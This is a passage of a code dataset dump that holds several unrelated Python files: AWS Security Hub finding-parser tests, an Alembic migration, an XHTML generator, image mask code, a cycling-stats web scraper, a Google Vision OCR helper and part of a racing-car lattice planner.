#\n###############################################################################\n\n\"\"\"\nSimple test to validate that the request format coming from the Cfn template\nwill turn into a valid API call.\n\"\"\"\nimport json\nfrom botocore.stub import Stubber\nimport pytest\nimport lib.sechub_findings as findings\nfrom lib.logger import Logger\nfrom lib.applogger import LogHandler\nfrom lib.awsapi_helpers import AWSClient\nfrom pytest_mock import mocker\n\nlog_level = 'info'\nlogger = Logger(loglevel=log_level)\ntest_data = 'tests/test_json_data/'\nstubber = Stubber(findings.securityhub)\n\n#------------------------------------------------------------------------------\n# Parse imported events\n#------------------------------------------------------------------------------\ndef test_parse_imported():\n\n test_cis_13 = open(test_data + 'CIS-1.3.json')\n event = json.loads(test_cis_13.read())\n test_cis_13.close()\n\n finding = findings.Finding(event['detail']['findings'][0])\n assert finding.details.get('Id') == event['detail']['findings'][0]['Id']\n assert finding.generator_id == 'arn:aws:securityhub:::ruleset/cis-aws-foundations-benchmark/v/1.2.0/rule/1.3'\n assert finding.account_id == '111111111111'\n assert finding.is_cis_ruleset() == { \n 'ruleset': 'cis-aws-foundations-benchmark', \n 'version': '1.2.0', \n 'ruleid': '1.3' \n }\n assert finding.is_aws_fsbp_ruleset() == False\n\n#------------------------------------------------------------------------------\n# \n#------------------------------------------------------------------------------\ndef test_parse_bad_imported():\n test_file = open(test_data + 'CIS-bad.json')\n event = json.loads(test_file.read())\n test_file.close()\n\n with pytest.raises(findings.InvalidFindingJson):\n finding = findings.Finding(event['detail']['findings'][0])\n\n#------------------------------------------------------------------------------\n# \n#------------------------------------------------------------------------------\ndef test_parse_custom_mismatch():\n test_file = open(test_data + 'custom-action-mismatch.json')\n event = json.loads(test_file.read())\n test_file.close()\n\n finding = findings.Finding(event['detail']['findings'][0])\n\n assert finding.details.get('Id') == event['detail']['findings'][0]['Id']\n assert finding.account_id == '111111111111'\n assert not finding.is_cis_ruleset()\n assert finding.is_aws_fsbp_ruleset() == { 'ruleset': 'aws-foundational-security-best-practices', 'version': '1.0.0', 'ruleid': 'CloudTrail.1' }\n\n#------------------------------------------------------------------------------\n# Parse custom action events\n#------------------------------------------------------------------------------\ndef test_parse_custom_match():\n test_file = open(test_data + 'CIS_1-6.json')\n event = json.loads(test_file.read())\n test_file.close()\n\n finding = findings.Finding(event['detail']['findings'][0])\n\n assert finding.details.get('Id') == event['detail']['findings'][0]['Id']\n assert finding.account_id == '111111111111'\n assert finding.is_cis_ruleset() == {\n 'ruleset': 'cis-aws-foundations-benchmark',\n 'version': '1.2.0',\n 'ruleid': '1.6'\n }\n assert not finding.is_aws_fsbp_ruleset()\n\n#------------------------------------------------------------------------------\n# notify\n# Criteria: absense of errors\n#------------------------------------------------------------------------------\ndef test_notify(mocker):\n test_file = open(test_data + 'CIS_1-6.json')\n event = json.loads(test_file.read())\n test_file.close()\n\n 
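# The tests above expect is_cis_ruleset() to decompose a generator id such as
# 'arn:aws:securityhub:::ruleset/cis-aws-foundations-benchmark/v/1.2.0/rule/1.3'
# into ruleset/version/ruleid. The library internals are not shown in this
# file, so the following is only an illustration of one way such ids split:
def parse_ruleset(generator_id):
    _, _, tail = generator_id.partition('ruleset/')
    if not tail:
        return None
    fields = tail.split('/')   # ['cis-aws-foundations-benchmark', 'v', '1.2.0', 'rule', '1.3']
    return {'ruleset': fields[0], 'version': fields[2], 'ruleid': fields[4]}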
finding = findings.Finding(event['detail']['findings'][0])\n\n logger = Logger(loglevel='info')\n logger_obj = mocker.patch('lib.logger.Logger.info', return_value=None)\n\n applogger = LogHandler('pytest')\n mocker.patch('lib.applogger.LogHandler.add_message', return_value='')\n\n # mocker.patch('lib.sechub_findings.Finding.resolve', return_value='')\n\n mocker.patch('lib.sechub_findings.Finding.update_text', return_value='')\n\n AWS = AWSClient('aws','us-east-1')\n mocker.patch('lib.awsapi_helpers.AWSClient.postit', return_value='')\n\n test_message = {\n 'Note': '',\n 'State': 'INFO',\n 'Account': '111111111111',\n 'Remediation': 'Remediate all the things',\n 'AffectedObject': 'An AWS Thingy',\n 'metrics_data': {'status': 'RESOLVED'}\n }\n findings.notify(finding, test_message, logger, cwlogs=applogger, sechub=True, sns=AWS)\n logger_obj.assert_called_once_with(\n 'INFO: \"Remediate all the things\" , Account Id: 111111111111, Resource: An AWS Thingy'\n )\n\n # assert logger_mock('message', mocker.ANY)\n test_message = {\n }\n findings.notify(finding, test_message, logger, cwlogs=applogger, sechub=True, sns=AWS)\n logger_obj.assert_called_with(\n 'INFO: error - missing note, Account Id: error, Resource: error'\n )\n","sub_path":"source/playbooks/python_tests/test_sechub_findings.py","file_name":"test_sechub_findings.py","file_ext":"py","file_size_in_byte":5971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"477160912","text":"\"\"\"add admin table\n\nRevision ID: 1c694f620b6\nRevises: 37da297d7473\nCreate Date: 2014-06-23 17:03:19.469727\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '1c694f620b6'\ndown_revision = '37da297d7473'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n op.create_table(\n 'admin',\n sa.Column('ukey', sa.VARCHAR(128), primary_key=True),\n sa.Column('date_created', sa.DateTime(), nullable=False))\n\n\ndef downgrade():\n op.drop_table('admin')\n","sub_path":"migration/versions/1c694f620b6_add_admin_table.py","file_name":"1c694f620b6_add_admin_table.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"68615739","text":"from __future__ import print_function, unicode_literals\n\nfrom pathlib import Path as _Path\n\n_default_author = dict(\n unicode_name=('', '堀内寛己', r'(ほりうちひろき)'),\n ascii_name=r'Hiroki Horiuchi',\n mail=r'x19290@gmail.com',\n)\n\ndef main():\n output = _Path(r'tmp.html')\n xhtml('\\n\\t
dummy par
', r'タイトル', r'1975-01-01', output)\n\ndef xhtml(body, title, date, output, summary='', copyright_=r'© 2016',\n author=_default_author, comment='', prev_ref=''\n ):\n from string import digits\n if comment:\n comment = '
%s
\\n' % comment\n name = list(author[r'unicode_name'])\n j = name.pop(0)\n short_name, long_name = name[0], j.join(name)\n ascii_name, mail = author[r'ascii_name'], author[r'mail']\n date_type = date[-1]\n template = _Path(__file__).with_name(r'template.html')\n with template.open(r'rt', encoding=r'UTF=8') as istream:\n template = istream.read()\n template = template.replace(r'@@null@@', '')\n template = template.replace(r'', 's')\n template = template.replace(r'', '>')\n template = template.replace(r';!-->', ';')\n template = template.replace('\\n\\t\\t%', '%').replace('\\n\\t%', '%')\n if date_type in digits:\n real_date = date\n else:\n real_date = date[:-1]\n xhtml = template % locals()\n with output.open(r'wt', encoding=r'UTF-8') as ostream:\n ostream.write(xhtml)\n\nif __name__ == r'__main__':\n main()\n","sub_path":"xhtml.py","file_name":"xhtml.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"269923019","text":"from PIL import Image\n\ndef create_sub_masks(mask_image):\n width, height = mask_image.size\n # print(width, height)\n\n # Initialize a dictionary of sub-masks indexed by RGB colors\n sub_masks = {}\n for x in range(width):\n for y in range(height):\n # Get the RGB values of the pixel\n pixel = mask_image.getpixel((x,y))[:3]\n\n # If the pixel is not black...\n if pixel != (0, 0, 0):\n # Check to see if we've created a sub-mask...\n pixel_str = str(pixel)\n sub_mask = sub_masks.get(pixel_str)\n # print(pixel_str)\n if sub_mask is None:\n # Create a sub-mask (one bit per pixel) and add to the dictionary\n # Note: we add 1 pixel of padding in each direction\n # because the contours module doesn't handle cases\n # where pixels bleed to the edge of the image\n sub_masks[pixel_str] = Image.new('1', (width+2, height+2))\n\n # Set the pixel value to 1 (default is 0), accounting for padding\n sub_masks[pixel_str].putpixel((x+1, y+1), 1)\n\n return sub_masks\n\nif __name__ == '__main__':\n im = Image.open('car_door_0_0.png')\n im.show()\n sub_mask = create_sub_masks(im)\n \n","sub_path":"JSON_generator/sub_masks_create.py","file_name":"sub_masks_create.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"211917731","text":"import openpyxl\nfrom selenium import webdriver\nfrom selenium.common.exceptions import InvalidElementStateException, NoSuchElementException\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\n\n\naEtappe = [30, 25, 23, 21, 19, 17, 15, 14, 13, 12, 10, 9, 8, 7, 6, 5, 4, 3, 2, 1]\nbEtappe = [35, 30, 27, 24, 22, 20, 18, 17, 16, 15, 13, 11, 9, 8, 7, 6, 5, 4, 3, 2]\ncEtappe = [40, 35, 32, 29, 27, 25, 23, 21, 19, 17, 15, 13, 11, 9, 8, 7, 6, 5, 4, 3]\ngcPoints = [85, 65, 55, 45, 40, 35, 31, 27, 23, 19, 15, 14, 13, 12, 11, 10, 9, 8, 7, 6]\n\n\ndef setup(url, column):\n driver = webdriver.PhantomJS()\n driver.set_window_size(1120, 800)\n driver.get(url)\n readpage(driver, column)\n driver.close()\n\n\ndef readpage(driver, column):\n elements = driver.find_elements_by_xpath(\"//span/a\")\n riders = []\n for rider in elements:\n if len(rider.text) > 1 and rider.text != \"Login/Sign-up\":\n riders.append(rider.text)\n fixstring(riders, column)\n\n\ndef fixstring(riders, column):\n fixriders = []\n for name in 
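# create_sub_masks() above visits every pixel in Python, which is slow for
# large masks. A numpy sketch of the same idea, one padded binary sub-mask
# per distinct non-black RGB color, using vectorized comparisons:
import numpy as np

def create_sub_masks_np(mask_image):
    arr = np.asarray(mask_image.convert('RGB'))
    sub_masks = {}
    for color in np.unique(arr.reshape(-1, 3), axis=0):
        if not color.any():                      # skip the black background
            continue
        mask = np.all(arr == color, axis=-1)
        sub_masks[str(tuple(color))] = np.pad(mask, 1)   # 1-pixel border, as in the sample
    return sub_masks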
range(0, len(riders), 2):\n name = riders[name].splitlines()\n if name[0] == \"DUMOULIN\" or name[0] == \"MARTIN\" or name[0] == \"IZAGIRRE\" or name[0] == \"HANSEN\" or name[0] == \"BENNETT\" or name[0] == \"JANSE VAN RENSBURG\":\n fixriders.append(name[0] + name[1][0])\n else:\n fixriders.append(name[0])\n writexlsx(fixriders, column)\n\n\ndef writexlsx(resultslist, column):\n filename = \"sprinters.xlsx\"\n wb = openpyxl.load_workbook(filename)\n sheet = wb.get_sheet_by_name('Sheet1')\n twocount = 1\n\n for i in resultslist:\n text = i\n result = i\n for i in range(3, 500):\n x = sheet['A' + str(i+1)]\n if x.value == text:\n sheet[column + str(i+1)] = \"Y\"\n twocount = twocount + 1\n wb.save('sprinters.xlsx')\n\nsetup(\"http://www.procyclingstats.com/race.php?id=163698\", \"C\")\nsetup(\"http://www.procyclingstats.com/race.php?id=163697\", \"E\")\nsetup(\"http://www.procyclingstats.com/race.php?id=163695\", \"G\")\nsetup(\"http://www.procyclingstats.com/race.php?id=163704\", \"I\")\nsetup(\"http://www.procyclingstats.com/race.php?id=163705\", \"K\")\nsetup(\"http://www.procyclingstats.com/race.php?id=163706\", \"M\")\nsetup(\"http://www.procyclingstats.com/race.php?id=163663\", \"O\")\n\n","sub_path":"procyclingstartlist.py","file_name":"procyclingstartlist.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"638726096","text":"# google library for communication with google vision api\nfrom google.cloud import vision\n\n# python-telegram-bot library\nfrom telegram import Update, File\n\n# Get temp folder and temp file names\nimport tempfile\n\n# System communication\nimport os\n\n\nclass Ocr:\n \"\"\"Class for communication with google vision api\"\"\"\n\n @staticmethod\n def get_text_from_image(image_file: File) -> str:\n \"\"\"Get text from image with google vision api\"\"\"\n\n # Get temp file path with tempfile library\n fd, temp_file_path = tempfile.mkstemp()\n\n # Download image\n image_file.download(temp_file_path)\n\n # Read image file as binary\n with open(temp_file_path, \"rb\") as image_file:\n content = image_file.read()\n\n # Create vision.Image object to use it in document_text_detection function\n image = vision.Image(content=content)\n\n # Get response from google vision api\n # client field will be add to function in telegram_bot.py script\n response = Ocr.client.document_text_detection(image=image)\n\n # Get text from response\n text = response.full_text_annotation.text\n\n # Close file, automatic deletion will occur\n os.close(fd)\n\n # Return text\n return text\n","sub_path":"image_to_text_bot/ocr_api.py","file_name":"ocr_api.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"273740129","text":"from mpc import trajectory_generator_utils, pure_pursuit_utils\nimport numpy as np\nfrom PIL import Image\nfrom numpy import linalg as LA\nimport math\nimport os, sys\nimport yaml\nimport msgpack\nfrom numba import njit\nfrom numba.typed import List, Dict\nimport time\nfrom mpc import AStrajectory_generator as trajectory_generator\n# import matplotlib.pyplot as plt\n\nBRAKE_STEPS = 60\nassert(BRAKE_STEPS <= trajectory_generator.NUM_STEPS)\n\n@njit(fastmath=False, cache=True)\ndef corner(current_s, WINDOW_SIZE, waypoints):\n # cond = np.abs(dxdy[0]/dxdy[1]) < self.CORNER_THRESH\n picked_s = current_s + WINDOW_SIZE\n current_s -= WINDOW_SIZE\n current_idx = np.searchsorted(waypoints[:, 
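# writexlsx() above rescans rows 4..500 of the sheet for every rider and calls
# wb.save() inside the loop. A sketch that builds the name -> row map once and
# saves once; sheet, column, and file names follow the sample:
import openpyxl

def mark_starters(riders, column, filename='sprinters.xlsx'):
    wb = openpyxl.load_workbook(filename)
    sheet = wb['Sheet1']                  # wb[...] replaces the deprecated get_sheet_by_name
    row_by_name = {sheet['A%d' % r].value: r for r in range(4, 501)}
    for name in riders:
        row = row_by_name.get(name)
        if row is not None:
            sheet['%s%d' % (column, row)] = 'Y'
    wb.save(filename)                     # single save at the end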
4], current_s, side='right') - 1\n picked_idx = np.searchsorted(waypoints[:, 4], picked_s, side='right') - 1\n if current_idx < 0:\n current_idx = 0\n if picked_idx < 0:\n picked_idx = 0\n if picked_idx < current_idx:\n curvature_sum = np.sum(waypoints[current_idx:, 5]) + np.sum(waypoints[0:picked_idx+1, 5])\n else:\n curvature_sum = np.sum(waypoints[current_idx:picked_idx+1, 5])\n curvature_sum = np.abs(curvature_sum)\n return curvature_sum\n\n@njit(fastmath=False, cache=True)\ndef flow_to_xytheta_static(st, pose, wpts, lut_resolution, speed_lut, window_size, curvature_thresh, corner_on_b4):\n # st (num_traj x 2)\n # pose [x, y, theta]\n if np.any(np.isnan(st)):\n return None, None, None, corner_on_b4\n # wpts = self.waypoints\n # pose_query = (int(np.round(pose[0]/self.lut_resolution)), int(np.round(pose[1]/self.lut_resolution)))\n pose_query = (int(np.round(pose[0]/lut_resolution)), int(np.round(pose[1]/lut_resolution)))\n # try:\n # pose_val = self.speed_lut[pose_query]\n # except:\n # return None, None, None\n if pose_query in speed_lut:\n pose_val = speed_lut[pose_query]\n else:\n return None, None, None, corner_on_b4\n current_s = pose_val[4]\n # corner_sum = corner(current_s, self.WINDOW_SIZE, self.waypoints)\n corner_sum = corner(current_s, window_size, wpts)\n # if corner_sum >= self.CURVATURE_THRESH:\n # self.CORNER_ON = True\n # temp_s = st[:, 0]*self.CURVATURE_THRESH/corner_sum#*.35\n # else:\n # self.CORNER_ON = False\n # temp_s = st[:, 0]\n if corner_sum >= curvature_thresh:\n corner_on = True\n temp_s = st[:, 0]*curvature_thresh/corner_sum#*.35\n else:\n corner_on = False\n temp_s = st[:, 0]\n new_s = current_s + temp_s\n new_s[new_s >= wpts[-1, 4]] -= wpts[-1, 4]\n waypoint_idx = np.searchsorted(wpts[:, 4], new_s, side='right') - 1\n waypoint_idx[waypoint_idx < 0] = 0\n waypoint_idx[waypoint_idx >= wpts.shape[0]-1] = wpts.shape[0] - 2\n l = (new_s - wpts[waypoint_idx, 4]) / (wpts[waypoint_idx+1, 4] - wpts[waypoint_idx, 4])\n new_x = wpts[waypoint_idx, 0] + l*(wpts[waypoint_idx+1, 0] - wpts[waypoint_idx, 0])\n new_y = wpts[waypoint_idx, 1] + l*(wpts[waypoint_idx+1, 1] - wpts[waypoint_idx, 1])\n pt_xy = np.stack((new_x, new_y), axis=1)\n angle = wpts[waypoint_idx, 3] + np.pi/2\n # xy = st[:, 1][:, None]*np.asarray([np.cos(angle), np.sin(angle)]).T + pt_xy\n angle_arr = np.stack((np.cos(angle), np.sin(angle)), axis=1)\n xy = np.expand_dims(st[:, 1], axis=1)*angle_arr + pt_xy\n xy -= np.expand_dims(pose[:2], axis=0)\n rot = np.array([[np.cos(-pose[2]), np.sin(-pose[2])],[-np.sin(-pose[2]), np.cos(-pose[2])]])\n xy = np.dot(xy, rot)\n theta = wpts[waypoint_idx, 3] + st[:, 2] - pose[2]\n theta = np.mod(theta, 2*np.pi)\n theta[theta>np.pi] -= (2*np.pi)\n temp = np.concatenate((xy, np.expand_dims(theta, axis=1)), axis=1)\n return temp, current_s, new_s, corner_on\n\nclass LatticePlanner(object):\n OPP_SPEED_SCALE = 1.00 # 0.99 for tempering\n def __init__(self, map_path, cost_weights, waypoints, directory, is_ego):\n \"\"\"\n Args:\n map_path (str): path to the map yaml file (ROS convention)\n cost_weights (ndarray(n,)): array of weights for each cost term\n waypoints (ndaaray(Nx4)): nominal raceline from tuner car\n\n \"\"\"\n self.limp_s = 0.\n self.is_limping = False\n self.is_ego = is_ego\n self.prev_traj = None\n self.prev_param = None\n self.prev_steer = 0.\n self.cost_weights = cost_weights\n self.waypoints = waypoints\n self.wheelbase = 0.3302\n self.max_reacquire = 10\n self.safe_speed = 2.5\n\n self.CORNER_ON = False\n self.track_lad = 1.0\n self.STEER_LP = 0.99\n 
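# corner() above sums the curvature column over an arc-length window around
# the car and wraps at the start/finish line. A stripped-down sketch of that
# windowed lookup (column 4 is cumulative s, column 5 is curvature, as above):
import numpy as np

def curvature_in_window(waypoints, s, half_window):
    lo = max(np.searchsorted(waypoints[:, 4], s - half_window, side='right') - 1, 0)
    hi = max(np.searchsorted(waypoints[:, 4], s + half_window, side='right') - 1, 0)
    if hi < lo:      # window wraps past the end of the lap
        total = waypoints[lo:, 5].sum() + waypoints[:hi + 1, 5].sum()
    else:
        total = waypoints[lo:hi + 1, 5].sum()
    return abs(total)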
#self.CORNER_THRESH = 0.\n self.CURVATURE_THRESH = 20.#10.\n # self.CURVATURE_THRESH = np.inf\n self.WINDOW_SIZE = 3.\n\n self.TOP_POP_NUM = 3\n\n lut_all = np.load(directory + 'mpc/lut_inuse.npz')\n self.lut_x = lut_all['x']\n self.lut_y = lut_all['y']\n self.lut_theta = lut_all['theta']\n self.lut_kappa = lut_all['kappa']\n self.lut = lut_all['lut']\n step_sizes = []\n step_sizes.append(self.lut_x[1]-self.lut_x[0])\n step_sizes.append(self.lut_y[1]-self.lut_y[0])\n step_sizes.append(self.lut_theta[1]-self.lut_theta[0])\n step_sizes.append(self.lut_kappa[1]-self.lut_kappa[0])\n self.lut_stepsizes = np.array(step_sizes)\n\n with open(directory+'config.yaml', 'r') as yaml_stream:\n try:\n config = yaml.safe_load(yaml_stream)\n speed_lut_name = config['speed_lut_name']\n range_lut_name = config['range_lut_name']\n except yaml.YAMLError as ex:\n print(ex)\n\n\n speed_lut_temp = msgpack.unpack(open(directory + speed_lut_name, 'rb'), use_list=False)\n self.speed_lut_numba = Dict()\n for key, val in speed_lut_temp.items():\n if key == b'resolution':\n continue\n self.speed_lut_numba[key] = val\n range_lut_temp = msgpack.unpack(open(directory + range_lut_name, 'rb'), use_list=False)\n self.range_lut_numba = Dict()\n for key, val in range_lut_temp.items():\n if key == b'resolution':\n continue\n self.range_lut_numba[key] = val\n \n # self.lut_resolution = 0.01\n self.lut_resolution = float(speed_lut_temp[b'resolution'][0])\n\n def update_cost(self, cost_weights):\n self.prev_traj = None\n self.prev_param = None\n self.prev_steer = 0\n self.cost_weights = cost_weights\n\n def _rotation_matrix(self, angle, direction, point=None):\n sina = math.sin(angle)\n cosa = math.cos(angle)\n direction = self._unit_vector(direction[:3])\n # rotation matrix around unit vector\n R = np.array(((cosa, 0.0, 0.0),\n (0.0, cosa, 0.0),\n (0.0, 0.0, cosa)), dtype=np.float64)\n R += np.outer(direction, direction) * (1.0 - cosa)\n direction *= sina\n R += np.array((( 0.0, -direction[2], direction[1]),\n ( direction[2], 0.0, -direction[0]),\n (-direction[1], direction[0], 0.0)),\n dtype=np.float64)\n M = np.identity(4)\n M[:3, :3] = R\n if point is not None:\n # rotation not around origin\n point = np.array(point[:3], dtype=np.float64, copy=False)\n M[:3, 3] = point - np.dot(R, point)\n return M\n\n def _unit_vector(self, data, axis=None, out=None):\n if out is None:\n data = np.array(data, dtype=np.float64, copy=True)\n if data.ndim == 1:\n data /= math.sqrt(np.dot(data, data))\n return data\n else:\n if out is not data:\n out[:] = np.array(data, copy=False)\n data = out\n length = np.atleast_1d(np.sum(data*data, axis))\n np.sqrt(length, length)\n if axis is not None:\n length = np.expand_dims(length, axis)\n data /= length\n if out is None:\n return data\n\n def _get_current_waypoint(self, waypoints, lookahead_distance, position, theta):\n wpts = waypoints[:, 0:2]\n # position = np.array(position[0:2])\n nearest_point, nearest_dist, t, i = pure_pursuit_utils.nearest_point_on_trajectory_py2(position, wpts)\n if nearest_dist < lookahead_distance:\n lookahead_point, i2, t2 = pure_pursuit_utils.first_point_on_trajectory_intersecting_circle(position, lookahead_distance, wpts, i+t, wrap=True)\n if i2 == None:\n return None\n current_waypoint = np.empty(waypoints[i2, :].shape)\n # x, y\n current_waypoint[0:2] = waypoints[i2, 0:2]\n # theta\n current_waypoint[3] = waypoints[i2, 3]\n # speed\n current_waypoint[2] = waypoints[i2, 2]\n return current_waypoint\n elif nearest_dist < self.max_reacquire:\n return waypoints[i, :]\n 
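# The planner above keys its msgpack-loaded lookup tables by quantized grid
# coordinates: a pose is rounded to the LUT resolution and used as a tuple
# key. A minimal sketch of that query pattern for a plain dict (the default
# resolution value is illustrative):
import numpy as np

def lut_query(lut, x, y, resolution=0.01):
    key = (int(np.round(x / resolution)), int(np.round(y / resolution)))
    return lut.get(key)      # None when the pose falls outside the mapped track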
else:\n return None\n\n def _get_current_speed(self, position, theta):\n wpts = self.waypoints[:, 0:2]\n position = position[0:2]\n nearest_point, nearest_dist, t, i = pure_pursuit_utils.nearest_point_on_trajectory_py2(position, wpts)\n speed = self.waypoints[i, 2]\n return speed, nearest_dist\n\n def _pure_pursuit(self, pose_x, pose_y, pose_theta, trajectory, lookahead_distance):\n # returns speed, steering_angle pair\n\n if trajectory is None:\n # trajectory gone, moving straight forward\n return self.safe_speed, 0.0\n position = np.array([pose_x, pose_y])\n lookahead_point = self._get_current_waypoint(trajectory, lookahead_distance, position, pose_theta)\n if lookahead_point is None:\n # no lookahead point, slow down\n return self.safe_speed, 0.0\n\n speed, steering_angle = pure_pursuit_utils.get_actuation(pose_theta, lookahead_point, position, lookahead_distance, self.wheelbase)\n\n # if abs(steering_angle) > 0.4189:\n # print('clipped')\n # steering_angle = (steering_angle/abs(steering_angle))*0.4189\n return speed, steering_angle\n\n\n # def flow_to_xytheta(self, st, pose):\n # # st (num_traj x 2)\n # # pose [x, y, theta]\n # if np.any(np.isnan(st)):\n # return None, None, None\n # wpts = self.waypoints\n # pose_query = (int(np.round(pose[0]/self.lut_resolution)), int(np.round(pose[1]/self.lut_resolution)))\n # try:\n # pose_val = self.speed_lut[pose_query]\n # except:\n # return None, None, None\n # current_s = pose_val[4]\n # # if self.corner(current_s):\n # corner_sum = corner(current_s, self.WINDOW_SIZE, self.waypoints)\n # if corner_sum >= self.CURVATURE_THRESH:\n # self.CORNER_ON = True\n # temp_s = st[:, 0]*self.CURVATURE_THRESH/corner_sum#*.35\n # else:\n # self.CORNER_ON = False\n # temp_s = st[:, 0]\n # new_s = current_s + temp_s\n # new_s[new_s >= wpts[-1, 4]] -= wpts[-1, 4]\n # waypoint_idx = np.searchsorted(wpts[:, 4], new_s, side='right') - 1\n # waypoint_idx[waypoint_idx < 0] = 0\n # waypoint_idx[waypoint_idx >= wpts.shape[0]-1] = wpts.shape[0] - 2\n # l = (new_s - wpts[waypoint_idx, 4]) / (wpts[waypoint_idx+1, 4] - wpts[waypoint_idx, 4])\n # new_x = wpts[waypoint_idx, 0] + l*(wpts[waypoint_idx+1, 0] - wpts[waypoint_idx, 0])\n # new_y = wpts[waypoint_idx, 1] + l*(wpts[waypoint_idx+1, 1] - wpts[waypoint_idx, 1])\n # pt_xy = np.stack((new_x, new_y), axis=1)\n # angle = wpts[waypoint_idx, 3] + np.pi/2\n # xy = st[:, 1][:, None]*np.asarray([np.cos(angle), np.sin(angle)]).T + pt_xy\n # # print('lattice xy', xy)\n # xy -= np.expand_dims(pose[:2], axis=0)\n # rot = np.array([[np.cos(-pose[2]), np.sin(-pose[2])],[-np.sin(-pose[2]), np.cos(-pose[2])]])\n # xy = np.dot(xy, rot)\n # theta = wpts[waypoint_idx, 3] + st[:, 2] - pose[2]\n # theta = np.mod(theta, 2*np.pi)\n # theta[theta>np.pi] -= (2*np.pi)\n # temp = np.concatenate((xy, np.expand_dims(theta, axis=1)), axis=1)\n # # time.sleep(0.5)\n # # print('grid', temp[0])\n # # print('theta', theta[0])\n # # print('wpt theta', wpts[waypoint_idx[0], 3])\n # # print('pose theta', pose[2])\n # return temp, current_s, new_s\n\n #TODO match new interface (i.e. 
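# _pure_pursuit() above delegates steering to pure_pursuit_utils.get_actuation.
# The underlying geometry is compact: express the lookahead point in the
# vehicle frame, command arc curvature 2*y/L**2, and convert with the bicycle
# model. The wheelbase mirrors the class attribute; this is a sketch, not the
# utility's actual implementation:
import numpy as np

def pure_pursuit_steer(pose_x, pose_y, pose_theta, goal_xy, wheelbase=0.3302):
    dx, dy = goal_xy[0] - pose_x, goal_xy[1] - pose_y
    local_y = -np.sin(pose_theta) * dx + np.cos(pose_theta) * dy
    curvature = 2.0 * local_y / (dx * dx + dy * dy)   # lookahead**2 in the denominator
    return np.arctan(wheelbase * curvature)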
receives current_vel) for plan_robust and plan_multiple\n def plan(self, pose, opp_pose, sampled_flow, other_prev_traj, other_prev_param, opp_collision, ds, current_vel):\n current_vel = max(0.01, current_vel)\n pose_x, pose_y, pose_theta = pose\n # sampled flow is: ds, dt, dtheta, dv for each knot pt on top of baseline v\n # return 0, 0, 0\n if self.is_ego:\n other_prev_traj[:,4]*=LatticePlanner.OPP_SPEED_SCALE\n \n # lookup_grid, current_s, new_s = self.flow_to_xytheta(sampled_flow[:, 0:3], pose)\n lookup_grid, current_s, new_s, corner_on = flow_to_xytheta_static(sampled_flow[:, 0:3], np.array(pose), self.waypoints, self.lut_resolution, self.speed_lut_numba, self.WINDOW_SIZE, self.CURVATURE_THRESH, self.CORNER_ON)\n self.CORNER_ON = corner_on\n if lookup_grid is None:\n safety_flag = False\n states_list_plot = None\n pp_traj, prev_traj_plot = self.getLimpParameters(pose_x, pose_y, current_vel)\n self.prev_flow = None\n return pp_traj, safety_flag, self.prev_flow, states_list_plot, prev_traj_plot, lookup_grid\n \n kappa0 = trajectory_generator.get_curvature_command(np.roll(self.prev_param,-1), ds+self.limp_s) if self.prev_param is not None else 0.0\n\n # traj lookup\n rot = self._rotation_matrix(pose_theta, (0, 0, 1))\n states_list_local, parameters_list, filtered_flow, filtered_grid, filtered_new_s = trajectory_generator_utils.grid_lookup(lookup_grid, self.lut_x, self.lut_y, self.lut_theta, self.lut_kappa, self.lut, sampled_flow, new_s, kappa0, self.lut_stepsizes)\n num_traj = parameters_list.shape[0]\n # print('num_traj', num_traj)\n # print('pose', pose_x, pose_y, pose_theta)\n if num_traj == 0:\n safety_flag = False\n states_list_plot = None\n pp_traj, prev_traj_plot = self.getLimpParameters(pose_x, pose_y, current_vel)\n self.prev_flow = None\n return pp_traj, safety_flag, self.prev_flow, states_list_plot, prev_traj_plot, lookup_grid\n\n states_list = trajectory_generator_utils.trans_traj_list(states_list_local, np.array([[pose_x], [pose_y], [0.0]]), rot)\n\n dspeed = filtered_flow[:, 3:]\n new_states_list = trajectory_generator_utils.get_velocity_profile(states_list, self.waypoints, dspeed, num_traj, current_vel)\n\n\n # TODO: get opponent states from somewhere\n\n # cost calculation\n if other_prev_traj is None or other_prev_param is None:\n other_prev_param = np.array([5., 0, 0, 0, 0])\n # TODO: assumes zero heading now\n other_prev_traj = np.zeros((trajectory_generator.NUM_STEPS, 5))\n temp = np.linspace(0., 5., trajectory_generator.NUM_STEPS)\n other_prev_traj[:, 0] = opp_pose[0]+temp*np.cos(opp_pose[2])\n other_prev_traj[:, 1] = opp_pose[1]+temp*np.sin(opp_pose[2])\n other_prev_traj[:, 4] = trajectory_generator_utils.WAYPOINT_SPEED\n self.prev_flow = None\n\n if self.prev_traj is None or self.prev_param is None:\n self.prev_param = np.array([5., 0, 0, 0, 0])\n self.prev_traj = np.zeros((trajectory_generator.NUM_STEPS, 5))\n temp = np.linspace(0., 5., trajectory_generator.NUM_STEPS)\n self.prev_traj[:, 0] = pose[0]+temp*np.cos(pose[2])\n self.prev_traj[:, 1] = pose[1]+temp*np.sin(pose[2])\n self.prev_traj[:,2] = pose[2]\n self.prev_traj[:, 4] += trajectory_generator_utils.WAYPOINT_SPEED\n self.prev_flow = None\n self.prev_steer = 0.0 \n prev_traj_plot = self.prev_traj\n pp_traj = np.empty((self.prev_traj.shape[0], 4))\n pp_traj[:, 0:2] = self.prev_traj[:, 0:2]\n pp_traj[:, 2] = self.prev_traj[:, 4]\n pp_traj[:, 3] = self.prev_traj[:, 2]\n return pp_traj, False, self.prev_flow, None, prev_traj_plot, lookup_grid\n\n opp_relative_weights = np.array([1.])\n\n traj_costs, end_xy = 
